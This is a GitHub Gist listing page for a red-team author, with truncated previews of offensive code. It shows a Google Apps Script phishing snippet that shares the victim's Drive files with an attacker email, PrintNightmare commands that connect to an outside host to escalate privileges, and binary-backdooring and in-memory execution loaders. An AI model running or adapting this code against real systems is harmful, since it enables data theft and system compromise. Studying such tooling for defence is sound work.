Dan Borges ahhh

👾

danger code

ahhh / driveSearch.gs

Last active June 16, 2023 00:55

Google App Script Phishing #2

	function driveSearch() {
	// Setup the exfil folder
	var user = Session.getActiveUser().getEmail();
	var folder = DriveApp.createFolder(user);
	var attackerEmail = "[email protected]";
	folder.addViewer(attackerEmail);

	// Search Drive
	var files = DriveApp.searchFiles('hidden = false');
	// Iterate through files in Drive

ahhh / csv_to_jsonl.py

Last active July 28, 2022 16:58

quick script to help convert documents

	#!env python
	import jsonlines
	import argparse
	import csv

	def parseArgs():
	parser = argparse.ArgumentParser(description='Convert CSV to JSONL')
	parser.add_argument('file', type=str, help='csv file to read')
	args = parser.parse_args()
	print("Processing CSV File: " + args.file)

ahhh / PrintNightmareToSystem.sh

Created September 1, 2021 00:34

	net use \\printnightmare.gentilkiwi.com\ipc$ /user:gentilguest password
	rundll32 printui.dll,PrintUIEntry /in /n"\\printnightmare.gentilkiwi.com\Kiwi Legit Printer"

ahhh / Invoke-PasswordRoll.ps1

Last active June 19, 2024 10:42

Microsoft helper script to change the local account passwords

	function Invoke-PasswordRoll
	{
	<#
	.SYNOPSIS
	This script can be used to set the local account passwords on remote machines to random passwords. The username/password/server combination will be saved in a CSV file.
	The account passwords stored in the CSV file can be encrypted using a password of the administrators choosing to ensure clear-text account passwords aren't written to disk.
	The encrypted passwords can be decrypted using another function in this file: ConvertTo-CleartextPassword
	Function: Invoke-PasswordRoll
	Author: Microsoft
	Version: 1.0

ahhh / go-sharp-loader.go

Created August 5, 2020 21:20 — forked from ropnop/go-sharp-loader.go

Example Go file embedding multiple .NET executables

	package main

	/*
	Example Go program with multiple .NET Binaries embedded

	This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with:
	$ go get -u github.com/gobuffalo/packr/packr

	Place all your EXEs are in a "binaries" folder

ahhh / invokeInMemLinux.go

Created July 19, 2020 21:22 — forked from capnspacehook/invokeInMemLinux.go

Executes a binary or file in memory on a Linux system. Uses the memfd_create(2) syscall. Credits and idea from: https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html

ahhh / binjection_example.gs

Created July 2, 2020 23:32

Binjection example in gscript

	// Example gscript template
	// Title: Binjection Example
	// Author: ahhh
	// Purpose: Replaces an existing binary with a copy that has been backdoored with shellcode
	// Gscript version: 1.0.0
	// ATT&CK:

	//priority:150
	//timeout:150
	//import:/tmp/loader.bin

ahhh / gbj.go

Created July 2, 2020 23:05

GBJ is a hacky shim used for using binjection in gscript

	package gbj

	import(
	"github.com/Binject/binjection/bj"
	)


	func PeBinject(sourceBytes []byte, shellcodeBytes []byte) ([]byte, error) {

ahhh / binjection_example.go

Created July 2, 2020 00:04

Using the binject/binjection library programatically

	package main

	import(
	"io/ioutil"
	"fmt"
	"github.com/Binject/binjection/bj"
	)

	var (
	example_path = "example.exe"

ahhh / msfconsole.rc

Created February 25, 2020 09:02

example msfconsole.rc from red team planning book

	spool /root/.msf4/spool.log
	setg ConsoleLogging true
	setg verbose true
	setg LogLevel 5
	setg SessionLogging true
	setg TimestampOutput true
	setg PromptTimeFormat %Y%m%d.%H%M%S%z
	setg PROMPT %T S:%S J:%J
	setg ExitOnSession false
	setg DisableCourtesyShell true